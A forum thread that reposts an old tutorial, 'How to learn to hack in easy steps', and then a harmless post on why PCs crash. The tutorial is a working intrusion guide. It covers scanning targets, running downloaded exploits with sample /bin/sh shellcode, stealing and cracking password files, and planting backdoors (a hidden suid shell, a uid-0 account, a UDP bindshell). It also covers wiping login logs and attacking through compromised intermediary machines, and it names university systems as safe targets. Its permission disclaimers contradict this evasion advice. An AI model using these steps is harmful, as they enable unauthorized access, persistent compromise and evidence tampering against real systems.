Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

How to learn to hack in easy steps

Discussion in 'Tech, Gadgets & Science Forum' started by MziziMkavu, Jun 18, 2011.

  1. MziziMkavu

    MziziMkavu JF-Expert Member

    #1
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    How to learn to hack in easy steps
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


    Introduction
    ~~~~~~~~~~~~


    Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
    met. I want to write this because most tutorials i've found (very good tutorials) are now
    old and don't fit just like they did before. This is why i'm going to teach you and show you
    the way to learn to hack.


    If you are a hacker, you read this, and find something that's not correct or you don't like,
    i want to know. mail me.


    I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
    i don't care at all as long as it's understandable.


    On this document I talk about many security tools, you can find all them and also contact
    me on my site: 3b0x.com


    When you finish reading it, please TELL ME how you like it!


    I want to make newer versions of it, check on my site to stay informed.


    COPYING: You're welcome to distribute this document to whoever the **** you want, post it
    on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
    If you want to perform it, ask me for permission. thanks a lot!


    DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
    promote computer crime and I'm not responible of your actions in any way.
    If you want to hack a computer, do the decent thing and ask for permission first.






    Let's start
    ~~~~~~~~~~~


    If you read carefully all what i'm telling here, you are smart and you work **** it,
    you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
    A hacker is someone who is able to discover unknown vulnerabilities in software and able to
    write the proper codes to exploit them.


    NOTE: If you've been unlucky, and before you found this document, you've readen the
    guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
    You won't understand some things from my tutorial until you unpoison your brain.




    Some definitions
    ~~~~~~~~~~~~~~~~


    I'm going to refer to every kind of computer as a box, and only as a box.
    This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
    Michael Knight's car, The Matrix, etc.


    The systems we're going to hack (with permission) are plenty of normal users, whose
    don't have any remote idea about security, and the root. The root user is called
    superuser and is used by the admin to administer the system.


    I'm going to refer to the users of a system as lusers. Logically, I'll refer to
    the admin as superluser.






    Operating Systems
    ~~~~~~~~~~~~~~~~~


    Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
    or perhaps a mac (motorola) box running macOS.


    You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
    systems.
    This is for two main reasons:


    -the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
    so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
    than running it at home?


    -all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
    you're running some kind of it.


    Let's see where to find the unix you're interested on.


    The UNIX systems may be divided in two main groups:


    - commercial UNIXes
    - free opensource UNIXes


    A commercial unix's price is not like windoze's price, and it usually can't run on your box,
    so forget it.


    The free opensource UNIXes can also be divided in:
    - BSD
    These are older and difficult to use. The most secure OS (openBSD) is in this group.
    You don't want them unless you're planning to install a server on them.


    - Linux
    Easy to use, stable, secure, and optimized for your kind of box. that's what we need.


    I strongly suggest you to get the SuSE distribution of Linux.
    It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

    Visit Linux-Betriebssystem | SUSE Linux Enterprise and look for a local store or order it online.
    (i know i said it the software was free, but not the CDs nor the manual nor the support.
    It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)


    If you own an intel box, then order the PC version.


    If you own a mac box, then order the PowerPC version.


    Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.


    It's possible you have problem with your hardware on the installation. Read the manual, ask
    for technical support or buy new hardware, just install it as you can.


    This is really important! READ THE MANUAL, or even buy a UNIX book.
    Books about TCP/IP and C programming are also useful.


    If you don't, you won't understand some things i'll explain later. And, of course, you'll
    never become a hacker if you don't read a lot of that 'literature'.






    the Internet
    ~~~~~~~~~~~~


    Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
    You want to hack internet boxes! So lets connect to the internet.


    Yes, i know you've gotten this document from the internet, but that was with windoze
    and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
    You're a Linux user, and you gotta open your way to the Internet.


    You gotta make your Linux box to connect to the net,
    so go and set up your modem (using YaST2 in SuSE).


    Common problems:


    If your box doesn't detect any modems, that probably means that you have no modem installed
    :-D (not a joke!).


    Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
    specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
    winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
    driver emulates that missing chip. And hat vendor driver is only available for windoze.




    ISA and external modems are more probably real modems, but not all of them.
    If you want to make sure wether a modem is or not a winmodem, visit HYPERLINK "http://start.at/modem"http://start.at/modem.


    Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)


    NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
    internet with aol. You can't hack with aol. i don't like aol. aol sucks.
    Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
    leave aol and get a real ISP. Then you'll be forgiven.




    Don't get busted
    ~~~~~~~~~~~~~~~~




    Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.


    It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.


    - Don't hack
    this is the most effective stealth technique. not even the FBI can bust you. :)
    If you choose this option, stop reading now, cause the rest is worthless and futile.


    - If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
    your own website oe email address, find your ISP, your phone number, your home...
    and you get busted!!


    - be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
    NEVER tell others you've hacked a box.


    - NEVER hack directly from your box (your_box --> victim's box).
    Always use a third box in the middle (your_box --> lame_box --> victim's box).


    Where lame_box is a previously hacked box or...a shell account box!
    A shell account is a service where you get control of a box WITHOUT hacking it.
    There are a few places where shell accounts are given for free. One of them is nether.net.

    - Don't hack dangerous boxes until you're a real hacker.
    Which boxes are dangerous:
    Military boxes
    Government boxes
    Important and powerful companies' boxes
    Security companies' boxes
    Which boxes are NOT dangerous:
    Educational boxes (any .edu domain)
    Little companies' boxes
    Japanese boxes


    - Always connect to the internet through a free and anonymous ISP
    (did i tell you that AOL is NOT an ISP?)


    - Use phreking techniques to redirect calls and use others' lines for your ISP call.
    Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.




    TCP ports and scanning
    ~~~~~~~~~~~~~~~~~~~~~~


    Do you got your stealth linux box connected to the internet (not aol)?
    Have you read the manual as i told you?




    Then we shall start with the **** real thing.


    First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
    (and others)


    It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
    your data to be sent.


    So you can open a connection and send data to any these ports. Those ports are associated with
    a service:


    Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
    on the box, opens its port and offers their **** service.


    here are some common ports and their usual services (there are a lot more):


    Port number Common service Example daemon (d stands for daemon)
    21 FTP FTPd
    23 Telnet telnetd
    25 SMTP sendmail (yes!)
    80 HTTP apache
    110 POP3 qpop




    Example:
    when you visit the website HYPERLINK "http://www.host.com/luser/index.html"Host, your browser does this:
    -it connects to the TCP port 80
    -it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
    (it really sends a lot of things more, but that is the essential)
    -the host sends the html file


    The cool thing of daemons is they have really serious security bugs.


    That's why we want to know what daemons are running there, so...


    We need to know what ports are opened in the box we want to hack.


    How could we get that information?


    We gotta use a scanner. A scanner is a program that tries to
    connect to every port on the box and tells which of them are opened.


    The best scanner i can think of is nmap, created by Fyodor.
    You can get nmap from my site in tarball or rpm format.


    Let's install nmap from an .rpm packet.


    bash-2.03$ rpm -i nmap-2.53-1.i386.rpm


    then we run it:


    bash-2.03$ nmap -sS target.edu


    Starting nmap V. 2.53 by fyodor@insecure.org ( Nmap - Free Security Scanner For Network Exploration & Security Audits. )
    Interesting ports on target.edu (xx.xx.xx.xx):
    (The 1518 ports scanned but not shown below are in state: closed)
    Port State Service
    21/tcp open ftp
    23/tcp open telnet
    25/tcp open smtp
    80/tcp open http
    110/tcp open pop3




    Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds




    Nmap has told us which ports are opened on target.edu and thus, what services it's offering.


    I know, i said telnet is a service but is also a program (don't let this confuse you).
    This program can open a TCP connection to the port you specify.


    So lets see what's on that ports.


    On your linux console, type:


    bash-2.03$ telnet target.edu 21
    Trying xx.xx.xx.xx...
    Connected to target.edu.
    Escape character is '^]'.
    220 target.edu FTP server (SunOS 5.6) ready.
    quit
    221 Goodbye.
    Connection closed by foreign host.


    You see?
    They speak out some valuable information:
    -their operating system is SunOS 5.6
    -their FTP daemon is the standard provided by the OS.


    bash-2.03$ telnet target.edu 25
    Trying xx.xx.xx.xx...
    Connected to target.edu.
    Escape character is '^]'.
    220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
    400 (EDT)
    quit
    221 2.0.0 target.edu closing connection
    Connection closed by foreign host.


    They like to tell us everything:
    -their SMTP daemon is sendmail
    -its version is 8.11.0/8.9.3


    Experiment with other ports to discover other daemons.


    Why is this information useful to us? cause the security bugs that can let us in depend
    on the OS and daemons they are running.


    But there is a problem here... such information can be faked!


    It's difficult to really know what daemons are they running, but we can know FOR SURE
    what's the operating system:


    bash-2.03$ nmap -sS target.edu


    Starting nmap V. 2.53 by fyodor@insecure.org ( Nmap - Free Security Scanner For Network Exploration & Security Audits. )
    Interesting ports on target.edu (xx.xx.xx.xx):
    (The 1518 ports scanned but not shown below are in state: closed)
    Port State Service
    21/tcp open ftp
    23/tcp open telnet
    25/tcp open smtp
    80/tcp open http
    110/tcp open pop3


    TCP Sequence Prediction: Class=random positive increments
    Difficulty=937544 (Good luck!)
    Remote operating system guess: Linux 2.1.122 - 2.2.14


    Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


    Hey wasn't it SunOS 5.6? **** they're a bunch of lame fakers!


    We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
    but the information we've already gathered should be enough.


    This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
    what's the OS there and its very difficult to avoid it.


    Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
    you their difficulty is low, that means their TCP sequence is predictable and we
    can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.


    Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
    And we don't want the admins to get angry with us, that's why we used the -sS option.
    This way (most) hosts don't detect ANYTHING from the portscan.
    Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
    usage of nmap's features, read its man page:


    bash-2.03$ man nmap




    How to upload and compile programs
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


    The most obvious and simple way is using FTP:


    bash-2.03$ ls
    program.c
    sh-2.03$ ftp target.edu
    Connected to target.edu.
    220 target.edu FTP server (SunOS 5.6) ready.
    Name: luser
    331 Password required for luser.
    Password:
    230 User luser logged in.
    ftp> put program.c
    200 PORT command successful.
    150 ASCII data connection for program.c (204.42.253.18,57982).
    226 Transfer complete.
    ftp> quit
    221 Goodbye.




    But this is not a really good way. It can create logs that will make the admin to detect us.


    Avoid uploading it with FTP as you can, use cut&paste instead.


    Here's how to make it:


    we run a text editor
    sh-2.03$ pico exploit.c
    if it doesn't work, try this one:
    sh-2.03$ vi exploit.c
    Of course, you must learn how to use vi.


    Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
    ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
    text from it. Change to your target and paste the code so you've 'uploaded' the file.


    To cut a text from the screen, you need to install the gpm packet from your linux distribution.
    This program lets you select and cut text with your mouse.


    If cut&paste doesn't work, you can also type it by hand (they aren't usually large).


    Once you get the .c file there, here's how to compile:


    sh-2.03$ gcc program.c -o program


    and execute:


    sh-2.03$ ./program






    Exploiting vulnerabilities
    ~~~~~~~~~~~~~~~~~~~~~~~~~~


    This is the most important part of our hacking experience. Once we know what target.edu
    is running, we can go to one of those EXPLOIT databases that are on the net.


    A exploit is a piece of code that exploits a vulnerability on its software. In the case of
    target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
    that fits. Note that sendmail is the buggiest and the **** daemon, thus the most easy
    exploitable. If your target gots an old version, you'll probably get in easyly.


    When we exploit a security bug, we can get:


    - a normal shell (don't know what a shell is? read a book of unix!)


    a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
    this one lets us send commands to the box, but we got limited priviledges.
    - a root shell
    this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.


    These are some exploit databases i suggest you to visit:


    www.hack.co.za
    www.r00tabega.org
    www.rootshell.com
    SecurityFocus
    Fyodor's Exploit World, Exploits for many Operating Systems including Linux,Solaris,Microsoft,Macintosh. For Hackers, Hacking, Computer Security auditing & testing


    Every exploit is different to use, so read its text and try them.
    They usually come in .c language.


    The most standar and easy to use exploits are buffer overflows.
    I won't explain here how a buffer overflow does work,
    Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
    You can download it from my site. (3b0x.com)


    Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
    This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
    is different to every OS, so this is a strong reason to know what OS they're running.


    We edit the .c file we've downloaded and look for something like this:


    char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";


    This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.


    You gotta replace it by the shellcode for the OS your target is running.
    You can find shellcodes for most OSes on my site or create your own by reading
    the text i mentioned before (Smash The Stack For Fun And Profit).


    IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
    if they let you do it, then you shall continue.
    if they don't give you permission, STOP HERE and try with another one.
    shall you continue without their permission, you'd be inquiring law and
    i'm not responible of your craziness in any way!!!


    You should have now the shell account, this is the time to use it!


    everything i explain on this section, do it through your shell account:


    bash-2.03$ telnet myshellaccount 23
    Trying xx.xx.xx.xx...
    Connected to yourshellaccount.
    Escape character is '^]'.
    Welcome to yourshellaccount
    login: malicioususer
    Password: (it doesn't display)
    Last login: Fry Sep 15 11:45:34 from <yourIPaddress>.
    sh-2.03$


    Here is a example of a buffer overflow (that doesn't really exist):


    we compile it:
    sh-2.03$ gcc exploit.c -o exploit
    we execute it:
    sh-2.03$ ./exploit
    This is a sendmail 8.9.11 exploit
    usage: ./exploit target port
    Sendmail works on port 25, so:
    sh-2.03$./exploit 25 target.edu
    Cool, '$' means we got a shell! Let's find out if we're root.
    $whoami
    root
    ****, we've rooted target.edu!
    $whyamiroot
    because you've hacked me! :) (just kidding)


    There are some exploits that don't give you root directly, but a normal shell.
    It depends on what luser is running the daemon. (sendmail is usually root)
    Then you'll have to upload a .c file with a local (local means it can't overflow
    a daemon, but a local program) overflow and compile it.


    Remember to avoid uploading it with FTP as you can.


    Other kind of exploit is the one that gives you access to the password file.
    If a host gots port 23 (telnet) opened, we can login as a normal user
    (remote root logins are usually not allowed) by putting his/hers/its username
    and password. Then use the su command to become root.


    sh-2.03$ telnet target.edu 23
    Trying xx.xx.xx.xx...
    Connected to target.edu.
    Escape character is '^]'.
    We're running SunOS 5.7
    Welcome to target.edu


    login: luser
    Password: (it doesn't display)
    Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
    sh-2.03$ whoami
    luser
    Are we lusers?
    sh-2.03$ su root
    Password:
    Don't think so...
    sh-2.03$ whoami
    root
    sh-2.03$


    Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
    Then, let's suppose we've extracted the password from luser and root. We can't login as
    root so we login as luser and run su. su asks us for the root password, we put it and...
    rooted!!


    The problem here is that is not easy to extract a root password from a password file.
    Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
    or a person's name.


    I said some admins are idiot (some of them are smart), but lusers are the more most
    idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
    you'll find that lusers set up rlogin doors for you to enter without a password, etc.
    Not to mention what happens when an admin gives a normal luser administrator priviledges
    with sudo or something.


    To learn how to crack a password file and extract its passwords, download a document called
    "cracking UNIX passwords" by Zebal. You can get it from my site (3b0x.com).


    Of course, I haven't listed all the exploit kinds that exist, only the most common.






    Putting backdoors
    ~~~~~~~~~~~~~~~~~


    Ok, we've rooted the system. Then what?


    Now you're able to change the webpage of that .edu box. Is that what you want to do?
    Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
    box, but they're not ashaming them with such things.


    Hacktivism is good and respected. You can change the page of bad people with bad ideologies
    like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.


    REMEMBER: ask for permission first!


    No, this time you should do another thing. You should keep that system for you to play with
    as a toy! (remember: your_box --> lame_box --> victim's box)


    Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
    back in.
    And it may not be possible:
    - the admin changed his password to something uncrackable.
    - they updated sendmail to a newer version so the exploit doesn't work.


    So now we're root and we can do everything, we shall put some backdoors that let us get back in.


    It may be interesting to read the paper about backdoors I host on my site. (3b0x.com)


    Anyway, i'll explain the basics of it.


    1.How to make a sushi:


    To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
    permissions:


    sh-2.03$ cp /bin/sh /dev/nul
    In the strange case the admin looks at /dev, he wouldn't find something unusual cause
    /dev/null does exist (who notices the difference?).
    sh-2.03$ cd /dev
    sh-2.03$ chown root nul
    Should yet be root-owned, but anyway...
    sh-2.03$ chmod 4775 nul
    4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.


    We've finished our 'duty', let's logout:
    sh-2.03$ exit


    Then, when we come back some day:
    sh-2.03$ whoami
    luser
    sh-2.03$ /dev/nul
    sh-2.03$ whoami
    root
    We're superluser again!




    There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
    we'd upload then the shell we want and make a sushi with it.
    The shell we want for this is SASH. A stand-alone shell with built-in commands.
    This one doesn't drop suid perms, and the commands are built-in, so external commands
    can't drop perms too! Remember to compile it for the architecture of the target box.
    Do you know where to get sash from? From my site :). (3b0x.com)


    2.How to add fake lusers.


    You gotta manipulate the users file: /etc/passwd
    try this:
    sh-2.03$ pico /etc/passwd
    if it doesn't work, try this:
    sh-2.03$ vi /etc/passwd
    Of course, you must learn how to use vi.


    This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell


    When uid=0 and gid=0, that luser gets superluser priviledges.


    Then we add a line like this:


    dood::0:0:dood:/:/bin/sh (put it in a hidden place)




    So, once we get a shell, we type:
    sh-2.03$ su dood
    sh-2.03$ whoami
    dood


    And now we're root because dood's uid=0 and gid=0.


    Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
    program in /bin that executes the shell you want with suid perms.


    I haven't got such a program at my site, but it shouldn't be difficult to develope.




    3.How to put a bindshell.


    A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
    The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
    and give a shell to you when you connect. The cool thing of UDP is this:


    If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
    They rarely remember UDP exists.


    You can get an UDP bindshell coded by !hispahack from my site.




    Cleaning up
    ~~~~~~~~~~~


    Remember when we logedin to target.edu as luser, and used su to become root?
    Take a look to this line:


    Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.


    Yes, that was displayed by the target box when we logedin there.
    It refers to the last login that the real luser did.


    So, what will be displayed when luser logsin again?


    Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.


    Then luser writes a mail to the admin:


    "It has happen some strange thing, when I loggedin today, I've read a line like this:


    Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.


    Does it mean I did login yesterday? It can't be, I don't work on sundays!
    I think it's a bug and this is your fault."


    The admin responds to luser:


    "That wasn't a bug! this line means someone acceded the system using your password, don't
    worry for that, we got his IP. That means we can ask his ISP what phone number did call
    at 10:32 and get <yourIPaddress>. Then we shall call the police and he'll get busted"


    So you'll get busted because luser was a bit clever (sometimes happens).


    So we gotta find a way to delete that.


    This information can be stored in:

    /usr/adm/lastlog
    /var/adm/lastlog
    /var/log/lastlog


    and we can erase it using lled (get it from my site)


    lled gots a buitin help that explains how to use it, remember to chmod the fake file
    created by lled like the substitute lastlog file.


    There is also some information we'd like to erase:


    Remember when i told you not to use FTP? Well, in case you did it, you must now
    use wted to clean up. Its sintax is very similar to lled.
    you can get it from my site.




    The who command shows us (and the admin) which lusers are logedin at the moment.
    What if we login and the admin is there?


    sh-2.03$ who
    root tty1 Sep 25 18:18


    Then we shall use zap2. If you loggedin as 'luser', then type:


    sh-2.03$ ./zap2 luser
    Zap2!
    sh-2.03$ who
    sh-2.03$


    And luser has never been here.




    Greetings
    ~~~~~~~~~


    Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you
    decide to continue learning and become a real hacker. You can visit my site (3b0x.com)
    for more advanced tutorials so you can improve your skills.


    I'd get very happy if you send me a mail telling me your impression about this paper (wether
    is good or bad), and you help me to improve it.


    I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups
    or other tutorials like this one. thanks to all.




    This paper was written on 26-9-00 by TDC


    Follow-Ups:
    HYPERLINK "msg02305.html"Re: Learn to hack hotmail and icq and aol
    From: diggitydog46@hotmail.com
    HYPERLINK "msg02242.html"Re: Learn to hack in easy steps
    From: Pornaddict2000<aron_58@mail.com>
    HYPERLINK "msg02225.html"Re: Learn to hack in easy steps
    From: asterixx@post.cz
    HYPERLINK "msg02186.html"Re: Learn to hack in easy steps
    From: shane4444@hotmail.com
    HYPERLINK "msg01990.html"Re: Learn to hack in easy steps
    From: Keith Koeppen<Joy_ride80@yahoo.com>
    Prev by Date: HYPERLINK "msg01449.html"Re: i can hack hotmail for free and in minutes
    Next by Date: HYPERLINK "msg01451.html"Re: Profile of a person using hotmail
    Prev by thread: HYPERLINK "msg01457.html"i canĀ“t find a hotmail password!!!
    Next by thread: HYPERLINK "msg01990.html"Re: Learn to hack in easy steps
    Index(es):
    HYPERLINK "mail9.html" \l "01450"Date
    HYPERLINK "threads.html" \l "01450"Thread
     
  2. MziziMkavu

    MziziMkavu JF-Expert Member

    #2
    Jun 18, 2011
    Joined: Feb 3, 2009
    Messages: 38,549
    Likes Received: 2,822
    Trophy Points: 280
    10 reasons why PCs crash U must Know


    Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."


    You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?


    1 Hardware conflict


    The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.


    For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.


    If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:


    * Start-Settings-Control Panel-System-Device Manager.


    Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.


    Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.


    Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is DriverGuide - XP Drivers, Windows 7 Drivers, Printer Drivers, Audio Drivers, CDROM Drivers, Network Drivers, USB Drivers, Device Drivers, Driver Downl. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).


    When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.


    To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.


    2 Bad Ram


    Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.


    But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.


    One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.


    Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.


    EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.


    3 BIOS settings


    Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.


    Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.


    A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.


    Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).


    4 Hard disk drives


    After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to


    * Start-Programs-Accessories-System Tools-Disk Defragmenter


    This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.


    The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).


    Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to


    * Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.


    Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.


    Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to


    * Start-Programs-Accessories-System Tools-ScanDisk


    Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.


    5 Fatal OE exceptions and VXD errors


    Fatal OE exception errors and VXD errors are often caused by video card problems.


    These can often be resolved easily by reducing the resolution of the video display. Go to


    * Start-Settings-Control Panel-Display-Settings


    Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.


    If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to


    * Start-Settings-Control Panel-System-Device Manager


    Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.


    If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.


    The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.


    Another useful way to resolve video problems is to go to


    * Start-Settings-Control Panel-System-Performance-Graphics


    Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).


    Look up your video card's manufacturer on the internet and search for the most recent drivers for it.


    6 Viruses


    Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to


    * Start-Settings-Control Panel-Add/Remove Programs


    Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.


    A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.


    An excellent antivirus programme is McAfee VirusScan by Network Associates ( McAfee?Antivirus, Encryption, DLP, IPS, Firewall, Email Security, Web Security, SaaS, Risk & Compliance Solutions). Another is Norton AntiVirus 2000, made by Symantec ( Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solutions).


    7 Printers


    The action of sending a document to print creates a bigger file, often called a postscript file.


    Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.


    If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.


    8 Software


    A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.


    The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.


